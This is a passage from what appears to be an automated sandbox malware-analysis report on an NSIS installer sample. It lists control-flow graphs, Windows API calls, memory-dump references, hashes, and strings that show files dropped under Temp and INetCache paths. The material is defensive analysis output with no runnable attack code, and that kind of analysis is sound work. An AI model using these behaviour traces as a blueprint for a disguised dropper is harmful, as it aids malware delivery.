                                                                                                          • FindFirstFileW.KERNELBASE(76F93420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                          • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                          • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                          • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974802433-0
                                                                                                          • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                          • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                          • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                          • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                          • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                          • DestroyWindow.USER32 ref: 00403CAE
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                          • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                          • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3282139019-0
                                                                                                          • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                          • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                          • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                          • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 380 40395e-403986 call 405f22 377->380 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 380->378 386 403988-40398c 380->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 424 403af8-403b08 GetClassInfoW RegisterClassW 418->424 425 403b0e-403b31 DialogBoxParamW call 40140b 418->425 419->418 420->393 421->402 426 403b57-403b5e call 40140b 421->426 424->425 430 403b36-403b3f call 4037ee 425->430 426->402 430->396
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 004038B8
                                                                                                            • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                          • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 0040391F
                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420), ref: 0040399F
                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: "C:\Users\user\Desktop\14lVOjBoI2.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                          • API String ID: 606308-1049813116
                                                                                                          • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                          • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                          • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                          • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 458 402eab-402eb2 451->458 459 402fcd-402fd5 call 402d8a 451->459 456 402f78-402f90 call 403258 call 403242 452->456 457 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->457 453->438 456->453 480 402f92-402f98 456->480 457->453 484 402fd7-402fe8 457->484 462 402eb4-402ec8 call 405be5 458->462 463 402f2e-402f32 458->463 459->453 471 402f3c-402f42 462->471 482 402eca-402ed1 462->482 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 475 402f51-402f5b 471->475 476 402f44-402f4e call 4064dc 471->476 475->448 483 402f61 475->483 476->475 480->453 480->457 482->471 486 402ed3-402eda 482->486 483->445 487 402ff0-402ff5 484->487 488 402fea 484->488 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 494 402eee-402f0e 491->494 495 40301e 492->495 494->453 496 402f14-402f18 494->496 495->438 497 402f20-402f28 496->497 498 402f1a-402f1e 496->498 497->471 499 402f2a-402f2c 497->499 498->483 498->497 499->471
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\14lVOjBoI2.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\14lVOjBoI2.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\14lVOjBoI2.exe,C:\Users\user\Desktop\14lVOjBoI2.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                          • String ID: "C:\Users\user\Desktop\14lVOjBoI2.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\14lVOjBoI2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 4283519449-204604610
                                                                                                          • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                          • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                          • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                          • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 626 401767-40178c call 402bbf call 405a80 631 401796-4017a8 call 406055 call 405a09 lstrcatW 626->631 632 40178e-401794 call 406055 626->632 637 4017ad-4017ae call 4062e9 631->637 632->637 641 4017b3-4017b7 637->641 642 4017b9-4017c3 call 406398 641->642 643 4017ea-4017ed 641->643 650 4017d5-4017e7 642->650 651 4017c5-4017d3 CompareFileTime 642->651 645 4017f5-401811 call 405c2a 643->645 646 4017ef-4017f0 call 405c05 643->646 653 401813-401816 645->653 654 401885-4018ae call 4051b4 call 403027 645->654 646->645 650->643 651->650 656 401867-401871 call 4051b4 653->656 657 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 653->657 668 4018b0-4018b4 654->668 669 4018b6-4018c2 SetFileTime 654->669 666 40187a-401880 656->666 657->641 689 40185c-40185d 657->689 670 402a55 666->670 668->669 672 4018c8-4018d3 CloseHandle 668->672 669->672 676 402a57-402a5b 670->676 674 4018d9-4018dc 672->674 675 402a4c-402a4f 672->675 678 4018f1-4018f4 call 406077 674->678 679 4018de-4018ef call 406077 lstrcatW 674->679 675->670 683 4018f9-40228d call 40579a 678->683 679->683 683->676 689->666 691 40185f-401860 689->691 691->656
                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed,?,?,00000031), ref: 004017A8
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed,?,?,00000031), ref: 004017CD
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed$C:\Users\user\AppData\Local\Temp\nsr675C.tmp$C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dll$Call
                                                                                                          • API String ID: 1941528284-1390023688
                                                                                                          • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                          • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                          • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                          • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-403050 692->694 693->694 695 403052 694->695 696 403059-40305e 694->696 695->696 697 403060-403069 call 403258 696->697 698 40306e-40307b call 403242 696->698 697->698 702 403230 698->702 703 403081-403085 698->703 704 403232-403233 702->704 705 4031db-4031dd 703->705 706 40308b-4030d4 GetTickCount 703->706 709 40323b-40323f 704->709 707 40321d-403220 705->707 708 4031df-4031e2 705->708 710 403238 706->710 711 4030da-4030e2 706->711 712 403222 707->712 713 403225-40322e call 403242 707->713 708->710 714 4031e4 708->714 710->709 715 4030e4 711->715 716 4030e7-4030f5 call 403242 711->716 712->713 713->702 725 403235 713->725 718 4031e7-4031ed 714->718 715->716 716->702 724 4030fb-403104 716->724 721 4031f1-4031ff call 403242 718->721 722 4031ef 718->722 721->702 730 403201-40320d call 405cdc 721->730 722->721 727 40310a-40312a call 40654a 724->727 725->710 734 403130-403143 GetTickCount 727->734 735 4031d3-4031d5 727->735 736 4031d7-4031d9 730->736 737 40320f-403219 730->737 738 403145-40314d 734->738 739 40318e-403190 734->739 735->704 736->704 737->718 740 40321b 737->740 741 403155-40318b MulDiv wsprintfW call 4051b4 738->741 742 40314f-403153 738->742 743 403192-403196 739->743 744 4031c7-4031cb 739->744 740->710 741->739 742->739 742->741 747 403198-40319f call 405cdc 743->747 748 4031ad-4031b8 743->748 744->711 745 4031d1 744->745 745->710 753 4031a4-4031a6 747->753 749 4031bb-4031bf 748->749 749->727 752 4031c5 749->752 752->710 753->736 754 4031a8-4031ab 753->754 754->749
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
